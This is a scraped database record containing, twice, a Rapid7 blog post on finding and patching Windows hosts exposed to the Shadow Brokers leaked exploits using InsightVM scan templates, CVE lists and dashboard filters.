href=\"https://lh5.googleusercontent.com/w2cWnRYjmkut-uz1wJOJ7yd0KrAK9cwf279I7Q_0msO0nYW1e9R1Xw4ZDKm40vupD5hUuP2oBncdoptB6R7QEVVoLrP8hQZur332gw2ST1gRb15N4cMa1QN4zMhVQY4bzdSBOsL6\"><img class=\"jive-image\" height=\"217\" src=\"https://lh5.googleusercontent.com/w2cWnRYjmkut-uz1wJOJ7yd0KrAK9cwf279I7Q_0msO0nYW1e9R1Xw4ZDKm40vupD5hUuP2oBncdoptB6R7QEVVoLrP8hQZur332gw2ST1gRb15N4cMa1QN4zMhVQY4bzdSBOsL6\" style=\"border-style: none;\" width=\"402\"/></a></span></span></p><p>Next, configure your Scan Template for specific vulnerability checks. Tailor your template by looking only for the checks associated with the CVEs exploited by the Shadow Brokers leak.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0143</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0144</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0145</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0146</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0147</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0148</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS10-061</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS14-068</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS09-050</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS08-067</span></p></td></tr></tbody></table></div><h4></h4><p>Use the CVEs to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FSelecting_vulnerability_checks.html\" rel=\"nofollow\" target=\"_blank\">search for the checks and add to your template</a>. Here, I&#8217;ve added CVE-2017-0144.</p><p><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\"> <span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh4.googleusercontent.com/5Z0ECaIK5CvJkbzc0EeqtJVB0VtNTY6uY6oqWn2rxSVKAWOhn7bGytddgRLkfJof5Rg8mqY5lWTqSPZrHB9vwlZiRsseBjBrbjAaD1yIjMQLYPqR1T_cwMgkKYyXxyr0vCSso1sJ\"><img class=\"jive-image\" height=\"111\" src=\"https://lh4.googleusercontent.com/5Z0ECaIK5CvJkbzc0EeqtJVB0VtNTY6uY6oqWn2rxSVKAWOhn7bGytddgRLkfJof5Rg8mqY5lWTqSPZrHB9vwlZiRsseBjBrbjAaD1yIjMQLYPqR1T_cwMgkKYyXxyr0vCSso1sJ\" style=\"border-style: none;\" width=\"446\"/></a></span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Now that you&#8217;ve got one template squared away, you can take your new Scan Template out for a spin on an entire Site, or an ad hoc scan, or you might want to check out <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7778\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/01/25/scan-configuration-improvements-in-nexpose\">improvements to Scan Configuration</a> to target a scan for just the subset of a Site.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>If you don&#8217;t have time for manual scans, create an <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7261\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2015/10/08/nexpose-60-new-feature-adaptive-security\">Automated Action</a> to scan an asset when it is discovered on your network. Whether you&#8217;ve discovered the asset via DHCP discovery connection or just by a regular discovery scan, you can use Automated Actions to scan the Asset when it appears.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Give your stakeholders a view</h2><p>I couldn&#8217;t leave you without one final tried and true tip for satisfying demanding executive stakeholders: You can always create a new dashboard!</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>I&#8217;ve created a custom Shadow Brokers Leak dashboard to house all the cards and analysis I&#8217;ll need.</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh3.googleusercontent.com/rCKJqi42hnHGN0eHvwZLi2i7GtVki2y4fiyziNQ4XVAJQNIBPk-wabf5qeT77p9SHA9E-z4W8nRsJUVakr8pN-EKAvn0XuRXJ9QCr3YY0ka2fC3kC2ivtBYv_s-UJ5qesrqbnr70\"><img class=\"jive-image\" height=\"308\" src=\"https://lh3.googleusercontent.com/rCKJqi42hnHGN0eHvwZLi2i7GtVki2y4fiyziNQ4XVAJQNIBPk-wabf5qeT77p9SHA9E-z4W8nRsJUVakr8pN-EKAvn0XuRXJ9QCr3YY0ka2fC3kC2ivtBYv_s-UJ5qesrqbnr70\" style=\"border-style: none;\" width=\"324\"/></a></span></p><p>Next, I&#8217;ll start adding Cards that I&#8217;d like to work with. Let&#8217;s use the Newly Discovered Assets card as a starting point. I&#8217;ve added this card to my Dashboard and I&#8217;ll click Expand Card to drill in.</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh6.googleusercontent.com/HgDK-qtwwkzlYf_Rftb-Thg6OwZiAG-GGFpLnjBR_3394Sid6zCXTlJS5quliFtkVJGqH4cSpV6BjdEDtc147nacnPnaSsMA9OyLhwBzB_VUdmyiUpGcp6nn7Ghi0eotxscQCh4V\"><img class=\"jive-image\" height=\"266\" src=\"https://lh6.googleusercontent.com/HgDK-qtwwkzlYf_Rftb-Thg6OwZiAG-GGFpLnjBR_3394Sid6zCXTlJS5quliFtkVJGqH4cSpV6BjdEDtc147nacnPnaSsMA9OyLhwBzB_VUdmyiUpGcp6nn7Ghi0eotxscQCh4V\" style=\"border-style: none;\" width=\"197\"/></a></span></p><p>Next, I&#8217;ll create a new filter to look only for Assets that are affected by CVE and hotfixes identified above. I&#8217;ll paste this into the Filter field:</p><blockquote class=\"jive-quote\"><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\" OR asset.vulnerability.title CONTAINS \"ms10-061\" OR asset.vulnerability.title CONTAINS \"ms10-068\" OR asset.vulnerability.title CONTAINS \"ms09-050\" OR asset.vulnerability.title CONTAINS \"ms08-067\" OR asset.vulnerability.title CONTAINS \"ms17-010\"</span></p></blockquote><p>It&#8217;ll look something like this:</p><p><span style=\"font-size: 11pt; font-family: Calibri; color: #212121;\"><span style=\"color: #212121; font-size: 11pt; font-family: Calibri;\"><a href=\"https://lh6.googleusercontent.com/BTn2iv4o1PqZZm5A2Y4HtDCX7Q2p9h5MNkNr1gxi_OPYL1dgDlLgk1QmU3lTeYzDdjzd9a5eVEfBcsTv70Yb5F9LqZGVoqNI2kobfXHBLzKfvqVfzsYaekrRqUz5vi2l06Ro9AK6\"><img class=\"jive-image\" height=\"132\" src=\"https://lh6.googleusercontent.com/BTn2iv4o1PqZZm5A2Y4HtDCX7Q2p9h5MNkNr1gxi_OPYL1dgDlLgk1QmU3lTeYzDdjzd9a5eVEfBcsTv70Yb5F9LqZGVoqNI2kobfXHBLzKfvqVfzsYaekrRqUz5vi2l06Ro9AK6\" style=\"border-style: none;\" width=\"624\"/></a></span> </span></p><p>I&#8217;ve saved this filter so I can use it across any number of cards I wish. Since I&#8217;ve done the work of creating the filter once, it is straightforward to add cards, apply the filter, and then save the Cards to my dashboard. I&#8217;ve built a tailored view, showing the impact of the Shadow Brokers leaked exploits on my organization.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"color: #212121; font-size: 11pt; font-family: Calibri;\"><a href=\"https://lh5.googleusercontent.com/LnU1nAPZkU1kmsVijrIaWw4MTrnnwXFDNnKq7_1l5FkhfsjdFUkCCtdghTBdypw9s3XhOKI4KtDILRz4_2qBBGRAnB3zX6i5G5G9ZevqDffx8Fz7nCUkhe8uFg05JcAqjPBF9yMN\"><img class=\"jive-image\" height=\"379\" src=\"https://lh5.googleusercontent.com/LnU1nAPZkU1kmsVijrIaWw4MTrnnwXFDNnKq7_1l5FkhfsjdFUkCCtdghTBdypw9s3XhOKI4KtDILRz4_2qBBGRAnB3zX6i5G5G9ZevqDffx8Fz7nCUkhe8uFg05JcAqjPBF9yMN\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>If you&#8217;re feeling comfortable with this approach, take a step futher! Try out an <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7838\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/04/24/actionable-remediation-projects\">Actionable Remediation Project</a> from here and get started taking down these risks on your turf.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Not a customer of ours? <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">Try a free 30-day trial of InsightVM here</a>.</p><h4></h4></div><!-- [DocumentBodyEnd:09493b2e-1b09-410b-94f5-219d718e7ddf] -->", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits", "modified": "2017-05-09T14:06:06", "lastseen": "2017-05-09T14:47:56"}, "differentElements": ["description", "published", "modified"], "edition": 1}], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:f67c4b5d-4e9f-4a32-a187-cc604c412a04] --><div class=\"jive-rendered-content\"><p><a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"30294\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/pdxbek\">Rebekah Brown</a> and the Rapid7 team have delivered a spot-on breakdown of the recent Shadow Brokers exploit and tool release. Before you read any further, if you haven&#8217;t done so already, please <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7842\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/04/18/the-shadow-brokers-leaked-exploits-faq\">read her post</a>. It&#8217;s probably not the only post you&#8217;ve read on this topic, but it is cogent, well-constructed and worth the 5 minutes.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Back with me? With all of the media attention and discussion in the infosec community, it would not surprise me to hear that a security team still wondered aloud: &ldquo;Nation-state intrigue makes for scintillating reading, but what do I do with this news?&#8221;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>So long as there are attackers and defenders in infosec, the Rapid7 community continues to be on the front lines of the struggle. But, in such a position, which action is prudent? Purchasing an underground bunker outright may not be a sound decision for you.&#160; However, there are practical actions you can take.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Don't waste a learning moment</h2><p>You invest in building and maintaining your <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsolutions%2Fvulnerability-management%2F\" target=\"_blank\">vulnerability management program</a>. This includes making sure you have visibility to the latest threats and perhaps <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7752\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2016/12/19/giving-the-gift-of-time-nexpose-adaptive-security-improvements\">automating your response</a>. The exploits thrust onto the world stage by the Shadow Brokers, while newsworthy, distill down to a seemingly normal set of patches and updates. As Rebekah's post states:</p><blockquote class=\"jive-quote\"><p dir=\"ltr\"><span style=\"font-family: arial, helvetica, sans-serif;\"><span style=\"font-size: 12pt; color: #000000;\">I</span><span style=\"font-size: 12pt; color: #000000;\">f you are unsure if you are up to date on these patches, we have checks for all of them in</span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\"><span style=\"font-size: 12pt; color: #000000;\"> </span><span style=\"font-size: 12pt; color: #1155cc;\">Rapid7 Nexpose</span></a><span style=\"font-size: 12pt; color: #000000;\"> and</span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\"><span style=\"font-size: 12pt; color: #000000;\"> </span><span style=\"font-size: 12pt; color: #1155cc;\">Rapid7 InsightVM</span></a><span style=\"font-size: 12pt; color: #000000;\">. These checks are all included in the </span><span style=\"font-size: 12pt; color: #000000;\">Microsoft Hotfix</span><span style=\"font-size: 12pt; color: #000000;\"> scan template.</span><span style=\"font-size: 12pt; color: #000000;\"> </span></span></p></blockquote><p>It turns out, if you&#8217;re maintaining your <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Ffundamentals%2Fvulnerability-management-and-scanning%2F\" target=\"_blank\">vulnerability scans</a>, and getting the visibility to your Windows assets, you already have the visibility you need. But that doesn&#8217;t mean you have to treat this event as business as usual.&#160; Perhaps you&#8217;d like to see how your security program fares when up against vaunted Shadow Brokers trove?</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Here are a few ideas you can try based on a mix of newer and long-standing capabilities.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Look for what you need</h2><p>If you want to efficiently identify the presence of Shadow Brokers&#8217; leaked vulnerabilities, and you don&#8217;t want to change your existing Scan regime, create a new Scan template.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>You&#8217;ll find creating a new <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FWorking_with_scan_templates_and_tuning_scan_performance.html\" rel=\"nofollow\" target=\"_blank\">Scan Template</a> in the Administration tab. Start off by naming your template:</p><p><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\"> <span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh5.googleusercontent.com/w2cWnRYjmkut-uz1wJOJ7yd0KrAK9cwf279I7Q_0msO0nYW1e9R1Xw4ZDKm40vupD5hUuP2oBncdoptB6R7QEVVoLrP8hQZur332gw2ST1gRb15N4cMa1QN4zMhVQY4bzdSBOsL6\"><img class=\"jive-image\" height=\"217\" src=\"https://lh5.googleusercontent.com/w2cWnRYjmkut-uz1wJOJ7yd0KrAK9cwf279I7Q_0msO0nYW1e9R1Xw4ZDKm40vupD5hUuP2oBncdoptB6R7QEVVoLrP8hQZur332gw2ST1gRb15N4cMa1QN4zMhVQY4bzdSBOsL6\" style=\"border-style: none;\" width=\"402\"/></a></span></span></p><p>Next, configure your Scan Template for specific vulnerability checks. Tailor your template by looking only for the checks associated with the CVEs exploited by the Shadow Brokers leak.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0143</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0144</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0145</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0146</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0147</span></p><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0148</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS10-061</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS14-068</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS09-050</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\" style=\"margin-bottom: 2pt;\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS08-067</span></p></td></tr></tbody></table></div><h4></h4><p>Use the CVEs to <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelp.rapid7.com%2Finsightvm%2Fen-us%2F%23Files%2FSelecting_vulnerability_checks.html\" rel=\"nofollow\" target=\"_blank\">search for the checks and add to your template</a>. Here, I&#8217;ve added CVE-2017-0144.</p><p><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\"> <span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh4.googleusercontent.com/5Z0ECaIK5CvJkbzc0EeqtJVB0VtNTY6uY6oqWn2rxSVKAWOhn7bGytddgRLkfJof5Rg8mqY5lWTqSPZrHB9vwlZiRsseBjBrbjAaD1yIjMQLYPqR1T_cwMgkKYyXxyr0vCSso1sJ\"><img class=\"jive-image\" height=\"111\" src=\"https://lh4.googleusercontent.com/5Z0ECaIK5CvJkbzc0EeqtJVB0VtNTY6uY6oqWn2rxSVKAWOhn7bGytddgRLkfJof5Rg8mqY5lWTqSPZrHB9vwlZiRsseBjBrbjAaD1yIjMQLYPqR1T_cwMgkKYyXxyr0vCSso1sJ\" style=\"border-style: none;\" width=\"446\"/></a></span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>Now that you&#8217;ve got one template squared away, you can take your new Scan Template out for a spin on an entire Site, or an ad hoc scan, or you might want to check out <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7778\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/01/25/scan-configuration-improvements-in-nexpose\">improvements to Scan Configuration</a> to target a scan for just the subset of a Site.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>If you don&#8217;t have time for manual scans, create an <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7261\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2015/10/08/nexpose-60-new-feature-adaptive-security\">Automated Action</a> to scan an asset when it is discovered on your network. Whether you&#8217;ve discovered the asset via DHCP discovery connection or just by a regular discovery scan, you can use Automated Actions to scan the Asset when it appears.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Give your stakeholders a view</h2><p>I couldn&#8217;t leave you without one final tried and true tip for satisfying demanding executive stakeholders: You can always create a new dashboard!</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p>I&#8217;ve created a custom Shadow Brokers Leak dashboard to house all the cards and analysis I&#8217;ll need.</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh3.googleusercontent.com/rCKJqi42hnHGN0eHvwZLi2i7GtVki2y4fiyziNQ4XVAJQNIBPk-wabf5qeT77p9SHA9E-z4W8nRsJUVakr8pN-EKAvn0XuRXJ9QCr3YY0ka2fC3kC2ivtBYv_s-UJ5qesrqbnr70\"><img class=\"jive-image\" height=\"308\" src=\"https://lh3.googleusercontent.com/rCKJqi42hnHGN0eHvwZLi2i7GtVki2y4fiyziNQ4XVAJQNIBPk-wabf5qeT77p9SHA9E-z4W8nRsJUVakr8pN-EKAvn0XuRXJ9QCr3YY0ka2fC3kC2ivtBYv_s-UJ5qesrqbnr70\" style=\"border-style: none;\" width=\"324\"/></a></span></p><p>Next, I&#8217;ll start adding Cards that I&#8217;d like to work with. Let&#8217;s use the Newly Discovered Assets card as a starting point. I&#8217;ve added this card to my Dashboard and I&#8217;ll click Expand Card to drill in.</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 12pt; font-family: Calibri;\"><a href=\"https://lh6.googleusercontent.com/HgDK-qtwwkzlYf_Rftb-Thg6OwZiAG-GGFpLnjBR_3394Sid6zCXTlJS5quliFtkVJGqH4cSpV6BjdEDtc147nacnPnaSsMA9OyLhwBzB_VUdmyiUpGcp6nn7Ghi0eotxscQCh4V\"><img class=\"jive-image\" height=\"266\" src=\"https://lh6.googleusercontent.com/HgDK-qtwwkzlYf_Rftb-Thg6OwZiAG-GGFpLnjBR_3394Sid6zCXTlJS5quliFtkVJGqH4cSpV6BjdEDtc147nacnPnaSsMA9OyLhwBzB_VUdmyiUpGcp6nn7Ghi0eotxscQCh4V\" style=\"border-style: none;\" width=\"197\"/></a></span></p><p>Next, I&#8217;ll create a new filter to look only for Assets that are affected by CVE and hotfixes identified above. I&#8217;ll paste this into the Filter field:</p><p><strong>*UPDATE: Corrected May 24,2017: Changed \"ms10-068\" to \"ms14-068\"*</strong></p><blockquote class=\"jive-quote\"><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\" OR asset.vulnerability.title CONTAINS \"ms10-061\" OR 